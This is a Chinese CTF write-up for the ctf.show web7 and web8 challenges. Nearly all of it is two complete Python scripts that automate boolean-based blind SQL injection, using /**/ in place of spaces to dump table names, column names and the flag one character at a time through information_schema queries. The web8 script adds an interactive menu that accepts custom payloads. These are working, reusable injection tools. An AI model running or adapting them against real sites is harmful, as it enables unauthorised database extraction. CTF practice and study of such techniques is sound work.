web7_8
2025年6月18日大约 7 分钟

分析一下
1. web7 与 web8 差不多，web8 多了一个逗号过滤
主要都是被空格过滤了,所以只能用 /**/ 代替空格,并且需要爆破
2. web7
import requests
import time
import urllib3
# Silence urllib3's InsecureRequestWarning; certificate verification is
# switched off on the session below, so every request would otherwise warn.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def sql_injection_exploit():
    """
    Boolean-based blind SQL injection brute-forcer for the web7 challenge.

    Builds a ``requests`` session against the hard-coded challenge URL,
    checks connectivity, then recovers table names, the ``flag`` table's
    column names and finally the flag itself one character at a time.

    Returns:
        The recovered flag string; the recovered table list when no flag
        was read; ``None`` when the connectivity check fails.
    """
    # Session and base parameters
    s = requests.session()
    # Challenge instance URL (adjusted from the error message)
    url = 'https://2fd242fc-c02b-4859-8072-b7e30909741d.challenge.ctf.show/index.php'
    # Request headers and TLS configuration
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
        'Connection': 'keep-alive'
    }
    s.headers.update(headers)
    # Certificate verification is disabled for this lab instance. With it off
    # the session accepts any certificate presented for the host, so keep the
    # session scoped to the challenge URL and do not reuse it elsewhere.
    s.verify = False
    # Adapter with retries to ride over transient connection problems
    adapter = requests.adapters.HTTPAdapter(
        max_retries=3,
        pool_connections=10,
        pool_maxsize=10
    )
    s.mount('https://', adapter)
    s.mount('http://', adapter)

    def brute_force_query(payload_template, description, hex_encode=False):
        """
        Generic character-by-character brute force over the closure's ``s``/``url``.

        Args:
            payload_template: ``%``-format string with two ``%s`` slots, filled
                with the 1-based character position and the candidate ASCII code.
            description: label used only in progress output.
            hex_encode: accepted for interface compatibility; this function
                never reads it.

        Returns:
            The recovered string (empty when no position matched).
        """
        result = ""
        print(f"\n开始爆破: {description}")
        for i in range(1, 100):
            print(f"正在爆破第 {i} 位...", end='', flush=True)
            found = False
            # Printable ASCII range 32-126
            for j in range(32, 127):
                try:
                    payload = payload_template % (str(i), str(j))
                    full_url = url + '?id=0/**/or/**/' + payload
                    response = s.get(
                        url=full_url,
                        verify=False,  # certificate verification off (see session setup)
                        timeout=15,
                        allow_redirects=True
                    )
                    # Decide success from the response body.
                    # NOTE(review): both strings count as a hit. If the page
                    # returned for a false condition also contains either of
                    # them, the first candidate (space, 32) matches at every
                    # position — confirm against the target's false response.
                    if 'I asked nothing' in response.text or 'You are in' in response.text:
                        result += chr(j)
                        print(f" 找到: '{chr(j)}' -> 当前结果: {result}")
                        found = True
                        break
                except requests.exceptions.SSLError as e:
                    print(f"\nSSL错误: {e}")
                    time.sleep(2)
                    continue
                except requests.exceptions.ConnectionError as e:
                    print(f"\n连接错误: {e}")
                    time.sleep(2)
                    continue
                except requests.exceptions.Timeout as e:
                    print(f"\n超时错误: {e}")
                    time.sleep(1)
                    continue
                except Exception as e:
                    # A failed candidate is skipped, not retried, so a transient
                    # error here silently drops that character value.
                    print(f"\n其他错误: {e}")
                    time.sleep(1)
                    continue
                # Delay so requests are not sent too quickly
                time.sleep(0.2)
            # No candidate matched: treat the string as finished
            if not found:
                print(f" 第 {i} 位未找到,爆破结束")
                break
        print(f"\n{description} 爆破完成: {result}")
        return result

    def test_connection():
        """
        Issue one plain GET to ``url``.

        Returns:
            True when any response came back (status code is printed but not
            checked); False when the request raised.
        """
        try:
            print("测试目标连接...")
            response = s.get(url, verify=False, timeout=10)
            print(f"连接测试成功,状态码: {response.status_code}")
            print(f"响应长度: {len(response.text)}")
            return True
        except Exception as e:
            print(f"连接测试失败: {e}")
            return False

    # Connectivity check first
    if not test_connection():
        print("无法连接到目标,程序退出")
        return None
    # Basic injection test
    # NOTE(review): the response length is only printed; nothing below
    # depends on it, so this probe cannot abort a run whose oracle is wrong.
    print("\n测试基本SQL注入...")
    test_payload = "1=1"
    try:
        test_response = s.get(url + '?id=1/**/or/**/' + test_payload, verify=False, timeout=10)
        print(f"注入测试响应长度: {len(test_response.text)}")
    except Exception as e:
        print(f"注入测试失败: {e}")
    # 1. Brute-force the table names of the current database
    print("\n=== 开始爆破流程 ===")
    # Corrected payload format
    table_payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),/**/%s,/**/1))=%s"
    tables = brute_force_query(table_payload, "数据库表名")
    if not tables:
        # Try the alternative substring(... from ... for ...) form
        print("尝试其他payload格式...")
        table_payload2 = "ascii(substring((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())/**/from/**/%s/**/for/**/1))=%s"
        tables = brute_force_query(table_payload2, "数据库表名(格式2)")
    # 2. Continue only when a table containing "flag" was found
    if tables and 'flag' in tables.lower():
        print(f"\n发现包含flag的表: {tables}")
        # Column names of the table named "flag" (0x666C6167)
        column_payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167),/**/%s,/**/1))=%s"
        columns = brute_force_query(column_payload, "flag表字段名")
        # 3. Read the flag data
        if columns:
            print(f"\n发现字段: {columns}")
            flag_payload = "ascii(substr((select/**/flag/**/from/**/flag),/**/%s,/**/1))=%s"
            flag = brute_force_query(flag_payload, "flag内容")
            print(f"\n🎉 最终FLAG: {flag}")
            return flag
    else:
        # NOTE(review): the published listing is unindented; this `else` is
        # read as the branch of the `if tables and ...` test above (no flag
        # table found -> read the flag table directly). If it was meant for
        # `if columns:` instead, it belongs one level further in.
        # Try reading the flag directly
        print("直接尝试读取flag...")
        flag_payload = "ascii(substr((select/**/flag/**/from/**/flag),/**/%s,/**/1))=%s"
        flag = brute_force_query(flag_payload, "flag内容")
        if flag:
            print(f"\n🎉 最终FLAG: {flag}")
            return flag
    return tables
def main():
    """
    Entry point for the web7 script: run the brute force and report the outcome.

    ``sql_injection_exploit`` is wrapped so that Ctrl-C prints a short
    notice and any other exception prints its message plus a traceback
    instead of propagating out of the script.
    """
    print("=== CTF SQL注入自动化爆破工具 (SSL修复版) ===")
    try:
        outcome = sql_injection_exploit()
    except KeyboardInterrupt:
        print("\n⚠️ 用户中断程序执行")
    except Exception as exc:
        print(f"\n❌ 程序执行出错: {exc}")
        import traceback
        traceback.print_exc()
    else:
        # A falsy result (None or "") means nothing was recovered
        if not outcome:
            print("\n❌ 爆破失败,请检查payload和目标响应")
            return
        print("\n✅ 爆破成功!")
        print(f"结果: {outcome}")
if __name__ == "__main__":
    main()
3. web8
import requests
import time
import sys
import urllib3
# Silence urllib3's InsecureRequestWarning; certificate verification is
# switched off on the sessions created below, so every request would warn.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def sql_blind_injection():
    """
    Interactive boolean-based blind SQL injection tool for the web8 challenge.

    Sets up a session against the hard-coded challenge URL, runs a
    connectivity check, then loops over a text menu: each numbered choice
    brute-forces one query template character by character and stores the
    result; choice 6 accepts a user-supplied template. All stored results
    are printed when the loop exits.
    """
    # Target URL - note this is HTTPS; the injection point is already in it
    url = 'https://d9c563cf-001f-4153-9fe1-964d7fa2db04.challenge.ctf.show/index.php?id=-1/**/or/**/'
    # Session configuration
    session = requests.Session()
    session.verify = False  # certificate verification off: any certificate is accepted for this host, lab use only
    session.headers.update({
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    })
    # Predefined payload templates; each takes (position, ascii_code) via two %d slots
    payloads = {
        '1': {
            'name': '获取当前数据库名',
            'payload': 'ascii(substr(database()/**/from/**/%d/**/for/**/1))=%d'
        },
        '2': {
            'name': '获取所有表名',
            'payload': 'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())/**/from/**/%d/**/for/**/1))=%d'
        },
        '3': {
            'name': '获取flag表字段名',
            'payload': 'ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)/**/from/**/%d/**/for/**/1))=%d'
        },
        '4': {
            'name': '获取flag表数据',
            'payload': 'ascii(substr((select/**/flag/**/from/**/flag)/**/from/**/%d/**/for/**/1))=%d'
        },
        '5': {
            'name': '尝试其他常见字段',
            'payload': 'ascii(substr((select/**/value/**/from/**/flag)/**/from/**/%d/**/for/**/1))=%d'
        },
        '6': {
            'name': '自定义payload',
            'payload': ''
        }
    }

    def brute_force_data(payload_template, description, max_length=100):
        """
        Recover a string one character at a time via the closure's ``session``/``url``.

        Args:
            payload_template: ``%``-format string with two ``%d`` slots
                (1-based position, candidate ASCII code).
            description: label for progress output.
            max_length: upper bound on the number of positions tried.

        Returns:
            The recovered string (empty when no position matched).
        """
        result = ''
        print(f'\n开始{description}...')
        print(f'Payload模板: {payload_template}')
        print('='*60)
        for i in range(1, max_length + 1):
            found_char = False
            print(f'正在获取第 {i} 个字符: ', end='', flush=True)
            # Printable ASCII range 32-126
            for j in range(32, 127):
                try:
                    # Build the full payload
                    # NOTE(review): a custom template with the wrong number of
                    # %d slots raises TypeError here; it is caught by the
                    # catch-all below and printed once per candidate instead of
                    # being rejected before the loop starts.
                    current_payload = payload_template % (i, j)
                    full_url = url + current_payload
                    # Send the request through the session (verification disabled above)
                    response = session.get(full_url, timeout=15)
                    # Several success conditions; any single true one is a hit.
                    # NOTE(review): 'If' is a substring of many English words
                    # and the length bound is a guess, so a false-branch page
                    # that trips either yields a wrong character.
                    success_indicators = [
                        'If' in response.text,
                        'You are in' in response.text,
                        'welcome' in response.text.lower(),
                        len(response.text) > 1000  # assumes the true-branch page is longer
                    ]
                    if any(success_indicators):
                        char = chr(j)
                        result += char
                        print(f"'{char}' -> 当前结果: {result}")
                        found_char = True
                        break
                except requests.exceptions.SSLError as e:
                    print(f'\nSSL错误,跳过: {e}')
                    time.sleep(1)
                    continue
                except requests.exceptions.RequestException as e:
                    print(f'\n请求异常: {e}')
                    time.sleep(1)
                    continue
                except Exception as e:
                    # The failed candidate is skipped, not retried
                    print(f'\n其他异常: {e}')
                    continue
                # Delay so requests are not sent too quickly
                time.sleep(0.1)
            # No candidate matched: the string has ended
            if not found_char:
                print('未找到,数据获取完成')
                break
        print(f'\n{description}完成!')
        print(f'最终结果: {result}')
        print('='*60)
        return result

    def test_connection():
        """
        Send a few probe payloads to ``url``.

        Returns:
            True at the first HTTP 200; False when none returns 200 or when
            a request raises.
        """
        try:
            print('测试目标连接...')
            test_payloads = [
                '1=1',
                'ascii("a")=97',
                'length(database())>0'
            ]
            for payload in test_payloads:
                print(f'测试payload: {payload}')
                response = session.get(url + payload, timeout=15)
                print(f'状态码: {response.status_code}, 响应长度: {len(response.text)}')
                # Show a snippet of the response body
                print(f'响应片段: {response.text[:200]}...')
                if response.status_code == 200:
                    return True
            return False
        except Exception as e:
            print(f'连接测试失败: {e}')
            return False

    def display_menu():
        """Print the numbered menu built from ``payloads`` plus the exit option."""
        print('\n' + '='*60)
        print('SQL盲注自动化爆破工具 (SSL修复版)')
        print('='*60)
        print('请选择要执行的操作:')
        for key, value in payloads.items():
            print(f'{key}. {value["name"]}')
        print('0. 退出程序')
        print('='*60)

    # Connectivity check; a failure is reported but does not stop the tool
    if not test_connection():
        print('连接测试失败,但继续尝试...')
        print('可能是响应判断条件需要调整')
    # Results keyed by the description shown in the menu
    results = {}
    # Main loop
    while True:
        display_menu()
        try:
            choice = input('请输入选择 (0-6): ').strip()
            if choice == '0':
                print('程序退出')
                break
            elif choice in ['1', '2', '3', '4', '5']:
                payload_info = payloads[choice]
                # Ask for the maximum length; int() failure lands in the ValueError handler below
                max_len = input(f'请输入最大长度 (默认60): ').strip()
                max_len = int(max_len) if max_len else 60
                # Run the brute force
                result = brute_force_data(
                    payload_info['payload'],
                    payload_info['name'],
                    max_len
                )
                # Save the result
                results[payload_info['name']] = result
                # Special handling for the two flag-reading templates
                if choice in ['4', '5'] and result:
                    print(f'\n🎉 可能的FLAG: {result}')
                    if 'ctfshow' in result.lower() or 'flag{' in result or result.startswith('ctfshow{'):
                        print('🚩 这很可能就是最终FLAG!')
            elif choice == '6':
                # Custom payload entered by the user
                print('\n自定义payload模式')
                print('payload中用 %d 表示位置和ASCII值')
                print('例如: ascii(substr(user()/**/from/**/%d/**/for/**/1))=%d')
                custom_payload = input('请输入自定义payload: ').strip()
                if custom_payload:
                    desc = input('请输入描述: ').strip() or '自定义查询'
                    max_len = input('请输入最大长度 (默认50): ').strip()
                    max_len = int(max_len) if max_len else 50
                    result = brute_force_data(custom_payload, desc, max_len)
                    results[desc] = result
            else:
                print('无效选择,请重新输入')
        except KeyboardInterrupt:
            print('\n\n用户中断程序')
            break
        except ValueError:
            print('请输入有效的数字')
        except Exception as e:
            print(f'发生错误: {e}')
    # Show all results
    if results:
        print('\n' + '='*60)
        print('所有结果汇总:')
        print('='*60)
        for desc, result in results.items():
            print(f'{desc}: {result}')
def quick_flag_mode():
    """
    Quick mode: try several column names of the ``flag`` table directly.

    Each candidate column is brute-forced character by character; the first
    value longer than 5 characters is returned.

    Returns:
        The recovered string, or ``None`` when no candidate produced one.
    """
    url = 'https://d9c563cf-001f-4153-9fe1-964d7fa2db04.challenge.ctf.show/index.php?id=-1/**/or/**/'
    # Session configuration
    session = requests.Session()
    session.verify = False  # certificate verification off: any certificate is accepted for this host, lab use only
    session.headers.update({
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    })
    print('🚀 快速flag获取模式')
    # Candidate column names to try, each with its (position, ascii_code) template
    field_attempts = [
        ('flag', 'ascii(substr((select/**/flag/**/from/**/flag)/**/from/**/%d/**/for/**/1))=%d'),
        ('value', 'ascii(substr((select/**/value/**/from/**/flag)/**/from/**/%d/**/for/**/1))=%d'),
        ('content', 'ascii(substr((select/**/content/**/from/**/flag)/**/from/**/%d/**/for/**/1))=%d'),
        ('data', 'ascii(substr((select/**/data/**/from/**/flag)/**/from/**/%d/**/for/**/1))=%d')
    ]
    for field_name, payload_template in field_attempts:
        print(f'\n尝试字段: {field_name}')
        result = ''
        for i in range(1, 80):
            found = False
            print(f'第{i}位: ', end='', flush=True)
            for j in range(32, 127):
                try:
                    payload = payload_template % (i, j)
                    response = session.get(url + payload, timeout=10)
                    # Several success conditions; any one of them is a hit
                    if ('If' in response.text or 'You are in' in response.text or
                            'welcome' in response.text.lower()):
                        result += chr(j)
                        print(f"'{chr(j)}' -> {result}")
                        found = True
                        break
                except:
                    # NOTE(review): a bare except also catches KeyboardInterrupt
                    # and SystemExit, so Ctrl-C cannot stop this loop cleanly and
                    # errors are hidden; narrowing it to
                    # requests.exceptions.RequestException would fix both.
                    continue
                time.sleep(0.05)
            # No candidate matched: stop this column
            if not found:
                break
        if result and len(result) > 5:
            print(f'\n🎉 字段 {field_name} 的值: {result}')
            if 'ctfshow' in result.lower() or 'flag{' in result:
                print('🚩 这很可能就是FLAG!')
            return result
    print('\n❌ 所有尝试都未成功')
    return None
def main():
    """
    Entry point for the web8 script: prompt for a mode and dispatch to it.

    Mode ``2`` runs ``quick_flag_mode``; any other input runs the full
    interactive ``sql_blind_injection``. Exceptions from either are printed
    with a traceback rather than propagating.
    """
    banner = '=' * 60
    print(banner)
    print('CTF SQL盲注工具 (SSL修复版)')
    print(banner)
    print('1. 完整模式 (推荐)')
    print('2. 快速flag模式')
    mode = input('选择模式 (1/2): ').strip()
    # Anything other than "2" falls back to the full mode
    run = quick_flag_mode if mode == '2' else sql_blind_injection
    try:
        run()
    except Exception as exc:
        print(f'程序异常: {exc}')
        import traceback
        traceback.print_exc()
# Script entry point; nothing runs on import
if __name__ == "__main__":
    main()